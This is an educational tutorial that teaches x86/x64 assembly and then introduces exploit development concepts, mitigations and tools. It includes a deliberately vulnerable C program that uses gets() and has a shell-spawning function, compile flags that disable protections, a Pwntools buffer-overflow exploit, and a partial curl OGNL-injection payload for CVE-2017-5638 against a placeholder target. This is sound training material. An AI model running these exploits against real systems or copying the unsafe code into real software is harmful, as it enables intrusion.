x86 and x64 Assembly from Scratch

🎯 Objective

To gain a deep, foundational understanding of how x86 and x64 assembly work, from CPU registers and calling conventions to memory addressing and function calls. This is critical for exploit developers who need precise control over memory, registers, and the instruction pointer.

1. Why Learn Assembly for Exploitation?

Exploit developers operate close to the metal — at the point where programming languages are compiled into instructions the CPU can directly understand. Memory corruptions, ROP chains, shellcode, and low-level payloads require understanding register state, stack layout, and control flow.

In exploit development:

You overwrite EIP or RIP
You pivot the stack (ESP or RSP)
You inject shellcode and need to place arguments in registers or memory
You must understand how values are passed and returned at the assembly level

2. Architecture Overview: x86 vs x64

2.1 x86 (32-bit)

4-byte registers (e.g., eax, ebx)
4GB virtual address space
Arguments passed via stack
Used in legacy applications or 32-bit systems

2.2 x64 (64-bit)

8-byte registers (rax, rbx)
64-bit pointers, more addressable memory (up to 18 exabytes)
First 4 arguments passed in registers (Windows: rcx, rdx, r8, r9)
Return values in rax

2.3 Register Subdivisions

Example (x64):

Register:         rax (64-bit)
 ├── eax (32-bit)
 │   ├── ax (16-bit)
 │       ├── ah (8-bit high)
 │       └── al (8-bit low)

3. Register Classifications

Class	Registers (x86/x64)	Description
General-purpose	`eax`, `ebx`, `ecx`, `edx` / `rax`…	Arithmetic, logic, data movement
Stack-related	`esp`, `ebp` / `rsp`, `rbp`	Stack pointer/base pointer
Instruction	`eip` / `rip`	Holds address of next instruction
Flags	`eflags` / `rflags`	Status indicators (ZF, CF, SF)
Segment	`cs`, `ds`, `es`, `ss`, `fs`, `gs`	Rare in userland, used in kernel
SIMD/FPU	`xmm0–xmm15`, `st0–st7`, `mm0–mm7`	Vector ops, floating point, MMX

4. Instruction Types and Syntax (Intel Style)

4.1 Syntax Format

instruction destination, source

4.2 Common Instructions

Category	Example	Meaning
Data Move	`mov eax, ebx`	Copy `ebx` to `eax`
Arithmetic	`add eax, 4`	`eax += 4`
Logical	`and eax, 0xFF`	Clear all but lower byte
Shift	`shr eax, 1`	Shift right (divide by 2)
Stack	`push ebp`, `pop eax`	Push/pull stack values
Control	`call`, `ret`, `jmp`, `je`, `jne`	Control flow

5. Addressing Modes and Operand Types

5.1 Addressing Types

Mode	Syntax	Example
Immediate	Value constant	`mov eax, 1`
Register	CPU register	`mov eax, ebx`
Direct Memory	Absolute addr	`mov eax, [0x12345678]`
Indirect Memory	Register ptr	`mov eax, [ebx]`
Indexed	Base + index	`mov eax, [ebp+4]`

5.2 Operand Sizes

BYTE PTR [mem]: 8-bit
WORD PTR [mem]: 16-bit
DWORD PTR [mem]: 32-bit
QWORD PTR [mem]: 64-bit

6. Memory Layout and Stack Anatomy

Typical process memory layout:

0xFFFFFFFF  ← Stack Top (grows down)
     |
     | Stack (local vars, return addr)
     |
     | Heap (malloc/calloc/free - grows up)
     |
     | BSS (uninitialized globals)
     |
     | Data (initialized globals)
     |
     | Text (code, .text segment - executable)
0x00000000  ← Null page

7. Calling Conventions

7.1 cdecl (x86 Linux default)

Arguments pushed right-to-left
Return value in eax
Caller cleans stack

7.2 stdcall (Windows APIs)

Callee cleans stack

7.3 fastcall (Microsoft optimized)

Some args in registers (e.g., ecx, edx)

7.4 System V AMD64 ABI (Linux x64)

Argument	Register
arg1	`rdi`
arg2	`rsi`
arg3	`rdx`
arg4	`rcx`
arg5	`r8`
arg6	`r9`

Return: rax

7.5 Windows x64 Calling Convention

Argument	Register
arg1	`rcx`
arg2	`rdx`
arg3	`r8`
arg4	`r9`

8. Function Prologue and Epilogue

x86 Example

push ebp
mov ebp, esp
sub esp, XX         ; allocate space
...
mov esp, ebp
pop ebp
ret

Why It Matters

Stack frames are key for local variables
Exploits often overwrite saved EIP/RIP on stack

9. Flags Register (EFLAGS/RFLAGS)

Flag	Meaning
ZF (Zero Flag)	Set if result is 0
CF (Carry Flag)	Set if carry occurred
SF (Sign Flag)	Set if negative
OF (Overflow)	Set if signed overflow
PF (Parity)	Set if result has even parity

Used with:

cmp, test, je, jg, jl, jne, jz, jnz

10. Interrupts and Syscalls

Linux (x86):

mov eax, 1   ; syscall number: exit
mov ebx, 0   ; exit code
int 0x80     ; software interrupt

Linux (x64):

mov rax, 60  ; syscall: exit
mov rdi, 0   ; exit code
syscall

11. Loop and String Instructions

Looping

mov ecx, 10
loop_label:
; code
loop loop_label  ; decrements ecx, jumps if ecx != 0

String Instructions (with REP prefix)

movsb, movsw, movsd
cmpsb, stosb, scasb, lodsb
rep, repe, repne

12. Writing Inline Assembly in C

int a = 5, b = 3, result;
__asm__(
    "movl %1, %%eax;"
    "addl %2, %%eax;"
    "movl %%eax, %0;"
    : "=r"(result)
    : "r"(a), "r"(b)
    : "%eax"
);

13. Compiling and Running Pure Assembly

hello.asm (NASM + Linux)

section .data
    msg db "Hello!", 0xA
    len equ $ - msg

section .text
    global _start

_start:
    mov eax, 4
    mov ebx, 1
    mov ecx, msg
    mov edx, len
    int 0x80

    mov eax, 1
    xor ebx, ebx
    int 0x80

nasm -f elf hello.asm
ld -m elf_i386 hello.o -o hello
./hello

14. Reverse Engineering and Disassembly

Use objdump, Ghidra, or radare2:

objdump -d binary
gdb ./binary

Look for:

Function prologue: push ebp; mov ebp, esp
Function calls: call 0x08048400
Stack usage: mov eax, [ebp+0x8]

15. Tools and Emulators

Tool	Use	Link
NASM	Write x86 ASM
GDB + Pwndbg	Debugging
x64dbg	Windows reversing
Godbolt	C to Assembly
Ghidra	Disassembler
Radare2	RE suite
Online x86 Emulator	Run x86 code in browser

✅ Summary

Assembly allows direct control of CPU and memory.
Key registers (eax, esp, eip) are critical for understanding control flow and payload placement.
Stack frames, calling conventions, and memory addressing are the basis of buffer overflows and ROP chains.
Tools like NASM, GDB, x64dbg, and Ghidra will help analyze and write exploits.

What is Exploit Development?

“Understanding the art of turning bugs into code execution”

🎯 Objective

To build a comprehensive understanding of what exploit development is, its goals, classifications, and how attackers leverage vulnerabilities to hijack program execution. This chapter covers vulnerability classes, real-world scenarios, memory manipulation techniques, and low-level primitives that form the core of exploitation.

1.1 What is an Exploit?

An exploit is a crafted input, payload, or sequence of interactions that takes advantage of a vulnerability in software to achieve unintended behavior, usually with malicious or unauthorized intent.

These behaviors may include:

Executing arbitrary code
Reading or writing sensitive memory
Causing a crash (Denial of Service)
Escalating privileges
Bypassing application logic

Example

// vulnerable.c
#include &lt;stdio.h>

int main() {
    char buffer[100];
    gets(buffer); // vulnerable to buffer overflow
    printf("You entered: %s\n", buffer);
    return 0;
}

If buffer is overrun, the return address on the stack can be overwritten, causing the program to jump to attacker-controlled code.

1.2 Exploit vs Payload vs Shellcode

Term	Description
Exploit	The method of taking control (e.g., stack buffer overflow, use-after-free)
Payload	The action performed once control is gained (e.g., spawn shell, reverse shell)
Shellcode	Compact machine code payload, usually to open a shell or call system functions

1.3 Exploitation Workflow

Discovery – Identify the vulnerability
Analysis – Reverse engineer the bug
Trigger – Create the condition to exploit it
Control – Gain instruction pointer (IP) control
Payload Execution – Run arbitrary code or commands
Post-Exploitation – Escalate privileges, persist, exfiltrate data

1.4 Exploitation Goals

Goal	Explanation
Code Execution	Execute arbitrary shellcode, malware, or system calls
Privilege Escalation	Elevate from user → admin/root/system
Information Disclosure	Leak memory (e.g., ASLR bypass, passwords)
Denial of Service	Crash system/service
Persistence	Survive reboots, re-infections
Evasion	Avoid AV, EDR, and logging tools

1.5 Exploit Types (By Technique)

Memory Corruption-Based

Stack Buffer Overflow
Overwriting return address on the stack.
Heap Overflow
Overwriting heap structures to gain arbitrary write or control flow.
Use-After-Free (UAF)
Using memory after it has been freed; attacker reallocates it with malicious data.
Double Free
Two free() calls on the same pointer can corrupt heap metadata.
Format String Bug
Using uncontrolled format strings like printf(user_input) leads to arbitrary read/write.
Integer Overflow/Underflow
Bypass size checks, leading to incorrect memory allocations.

Logical Vulnerabilities

Race Conditions
Timing issues in multithreaded environments.
Improper Access Control
Missing authentication or authorization checks.
Insecure Deserialization
Arbitrary object creation from untrusted data.

1.6 Real Exploitation Example

Here’s a simple Linux example of stack-based control hijacking.

vulnerable.c

#include &lt;stdio.h>
#include &lt;string.h>
#include &lt;stdlib.h>

void secret() {
    printf("PWNED! Code execution achieved!\n");
    system("/bin/sh");
}

void vulnerable() {
    char buffer[64];
    printf("Enter input: ");
    gets(buffer); // unsafe
}

int main() {
    vulnerable();
    return 0;
}

Compile with protections disabled:

gcc vulnerable.c -o vuln -fno-stack-protector -z execstack -no-pie

Exploitation Steps

Overflow buffer and overwrite return address
Redirect execution to secret()
Shell spawned

You can use Pwntools to automate the attack:

from pwn import *

elf = ELF('./vuln')
p = process(elf.path)

payload = b'A' * 72  # Offset to return address
payload += p64(elf.symbols['secret'])

p.sendlineafter('Enter input: ', payload)
p.interactive()

1.7 Common Exploit Development Toolset

Tool	Purpose	Link
GDB	Debugging on Linux	https://www.gnu.org/software/gdb/
Pwndbg	GDB plugin for exploit dev	https://github.com/pwndbg/pwndbg
Pwntools	Python framework for writing exploits	https://github.com/Gallopsled/pwntools
x64dbg	Windows GUI debugger	https://x64dbg.com/
Immunity Debugger	SEH exploit development	https://www.immunityinc.com/products/debugger/
IDA Pro / Ghidra	Reverse engineering	https://ghidra-sre.org/
ROPgadget	ROP chain finder	https://github.com/JonathanSalwan/ROPgadget
Mona.py	ROP + exploit helper for Immunity	https://github.com/corelan/mona
Radare2	Binary analysis CLI tool	https://rada.re/n/
msfvenom	Shellcode & payload generator	https://docs.metasploit.com/

1.8 Architectural Concepts

Registers
- x86: eax, ebx, esp, ebp, eip
- x64: rax, rbx, rsp, rbp, rip
Calling Conventions
- cdecl (caller cleans up stack)
- stdcall (callee cleans up stack)
- fastcall, sysv, Windows x64 (RCX, RDX, R8, R9)
Endianness
- Most systems are little-endian (e.g., 0xdeadbeef stored as ef be ad de)

1.9 Operating System Security Mechanisms

Mitigation	Description
DEP / NX	Non-executable stack/heap
ASLR	Randomized memory layout
Stack Cookies	Canary values to detect buffer overflows
SEH	Structured Exception Handling (Windows)
SMEP / KASLR	Kernel memory protection

We will cover bypass techniques for these later in:

Return Oriented Programming (ROP)
ret2libc
Shellcode relocation
Heap grooming

1.10 Real-World Exploit Example (CVE)

CVE-2017-5638 – Apache Struts2 RCE

Vulnerability: Crafted Content-Type header triggers OGNL injection.
Exploit: curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}" \ http://target.com/struts2-showcase/upload.action

Another: CVE-2017-0144 – EternalBlue

MS SMBv1 vulnerability
Used in WannaCry ransomware
Kernel-level remote exploit on Windows XP to Windows 7

1.11 Ethics and Legal Responsibility

Exploit development is highly sensitive and legally restricted when performed outside ethical boundaries.

Use only in:

Lab environments
Capture the Flag (CTF) competitions
Bug bounty programs
With explicit authorization

Unauthorized access or exploitation is illegal and unethical.

✅ Summary

An exploit is not just a payload but the entire logic and sequence required to hijack control flow.
Memory corruption (e.g., buffer overflow, UAF) is a primary class of vulnerabilities.
The exploitation process involves discovery, analysis, payloading, and post-exploitation steps.
A good exploit developer is part developer, part reverse engineer, and part OS internals expert.
Modern defenses like DEP, ASLR, stack cookies require advanced techniques to bypass.